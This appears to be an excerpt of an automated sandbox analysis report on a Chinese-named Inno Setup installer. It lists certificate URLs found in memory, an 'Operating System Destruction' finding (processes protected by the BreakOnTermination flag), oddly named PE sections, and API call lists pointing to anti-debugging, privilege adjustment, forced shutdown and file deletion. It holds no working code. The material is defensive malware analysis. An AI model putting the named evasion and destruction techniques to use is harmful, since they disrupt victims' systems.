Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000003.1376560783.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.11.dr, update.vac.11.dr, update.vac.6.dr, hrsw.vbc.11.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1277615508.0000000003590000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1278543122.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000000.1280165742.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000000.1383564167.0000000000C8D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1277615508.0000000003590000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1278543122.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000000.1280165742.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000000.1383564167.0000000000C8D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
PE file contains section with special chars
Source: update.vac.6.drStatic PE information: section name: .#.q
Source: update.vac.11.drStatic PE information: section name: .#.q
Source: hrsw.vbc.11.drStatic PE information: section name: .#.q
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C915690 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,11_2_6C915690
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C793886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,11_2_6C793886
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C793C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,11_2_6C793C62
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C793D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,11_2_6C793D62
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C793D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,11_2_6C793D18
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C7939CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,11_2_6C7939CF
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C793A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,11_2_6C793A6A
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9162D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,11_2_6C9162D0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C791950: CreateFileA,DeviceIoControl,CloseHandle,11_2_6C791950
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C794754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,11_2_6C794754
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C79475411_2_6C794754
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C7A4A2711_2_6C7A4A27
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C911DF011_2_6C911DF0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C916FB311_2_6C916FB3
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C976CE011_2_6C976CE0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9E4DE011_2_6C9E4DE0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9C6D1011_2_6C9C6D10
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C948EA111_2_6C948EA1
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C962EC911_2_6C962EC9
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9CEEF011_2_6C9CEEF0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C99AEEF11_2_6C99AEEF
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C99489611_2_6C994896
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9DC8D011_2_6C9DC8D0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9BE81011_2_6C9BE810
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9D682011_2_6C9D6820
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9E487011_2_6C9E4870
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9E699911_2_6C9E6999
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9C690011_2_6C9C6900
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9DA93011_2_6C9DA930
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9D895011_2_6C9D8950
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C94897211_2_6C948972
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9D4AA011_2_6C9D4AA0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9A0A5211_2_6C9A0A52
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9BAB9011_2_6C9BAB90
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9DEBC011_2_6C9DEBC0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C950BCA11_2_6C950BCA
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C960B6611_2_6C960B66
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9D448911_2_6C9D4489
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9A84AC11_2_6C9A84AC
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9CE4D011_2_6C9CE4D0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9CC58011_2_6C9CC580
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9C258011_2_6C9C2580
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9C45D011_2_6C9C45D0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9B252111_2_6C9B2521
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9D852011_2_6C9D8520
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9E46C011_2_6C9E46C0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9DE60011_2_6C9DE600
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9D67A011_2_6C9D67A0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C94C7CF11_2_6C94C7CF
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9E67C011_2_6C9E67C0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9AC7F311_2_6C9AC7F3
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9CE0E011_2_6C9CE0E0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9C002011_2_6C9C0020
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9DC2A011_2_6C9DC2A0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9D820011_2_6C9D8200
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9E5D9011_2_6C9E5D90
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9C3D5011_2_6C9C3D50
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C997D4311_2_6C997D43
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9C9E8011_2_6C9C9E80
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9A1F1111_2_6C9A1F11
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9B589F11_2_6C9B589F
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9D78C811_2_6C9D78C8
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9C99F011_2_6C9C99F0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9C1AA011_2_6C9C1AA0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9BDAD011_2_6C9BDAD0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9BFA5011_2_6C9BFA50
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C96540A11_2_6C96540A
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9CF5C011_2_6C9CF5C0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C98F5EC11_2_6C98F5EC
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9C96E011_2_6C9C96E0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9BB65011_2_6C9BB650
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9DF64011_2_6C9DF640
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9E37C011_2_6C9E37C0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9E970011_2_6C9E9700
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C96309211_2_6C963092
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9D6AF011_2_6C9D6AF0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9D375011_2_6C9D3750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AB81EC17_2_00AB81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF81C017_2_00AF81C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0824017_2_00B08240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AE425017_2_00AE4250
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0C3C017_2_00B0C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B004C817_2_00B004C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AE865017_2_00AE8650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AC094317_2_00AC0943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AEC95017_2_00AEC950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AE8C2017_2_00AE8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B04EA017_2_00B04EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B00E0017_2_00B00E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AD10AC17_2_00AD10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AFD08917_2_00AFD089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF518017_2_00AF5180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B091C017_2_00B091C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AED1D017_2_00AED1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0112017_2_00B01120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0D2C017_2_00B0D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AD53F317_2_00AD53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A753CF17_2_00A753CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00ABD49617_2_00ABD496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B054D017_2_00B054D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0D47017_2_00B0D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A7157217_2_00A71572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0155017_2_00B01550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AFD6A017_2_00AFD6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AC965217_2_00AC9652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A797CA17_2_00A797CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A8976617_2_00A89766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0D9E017_2_00B0D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A71AA117_2_00A71AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF5E8017_2_00AF5E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF5F8017_2_00AF5F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A8E00A17_2_00A8E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF22E017_2_00AF22E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B1230017_2_00B12300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00ADE49F17_2_00ADE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF25F017_2_00AF25F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AEA6A017_2_00AEA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AE66D017_2_00AE66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0E99017_2_00B0E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF2A8017_2_00AF2A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00ACAB1117_2_00ACAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF6CE017_2_00AF6CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF70D017_2_00AF70D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AEB18017_2_00AEB180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00ADB12117_2_00ADB121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0720017_2_00B07200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AFF3A017_2_00AFF3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A9B3E417_2_00A9B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0F3C017_2_00B0F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AFF42017_2_00AFF420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AE741017_2_00AE7410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0F59917_2_00B0F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0353017_2_00B03530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B1351A17_2_00B1351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AEF50017_2_00AEF500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B1360117_2_00B13601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AE379017_2_00AE3790
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B077C017_2_00B077C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A9F8E017_2_00A9F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AEF91017_2_00AEF910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AC3AEF17_2_00AC3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF7AF017_2_00AF7AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A8BAC917_2_00A8BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A8BC9217_2_00A8BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF7C5017_2_00AF7C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AEFDF017_2_00AEFDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00A728E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00A71E40 appears 150 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00B0FB10 appears 723 times
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: String function: 6C949240 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: String function: 6C9E6F10 appears 652 times
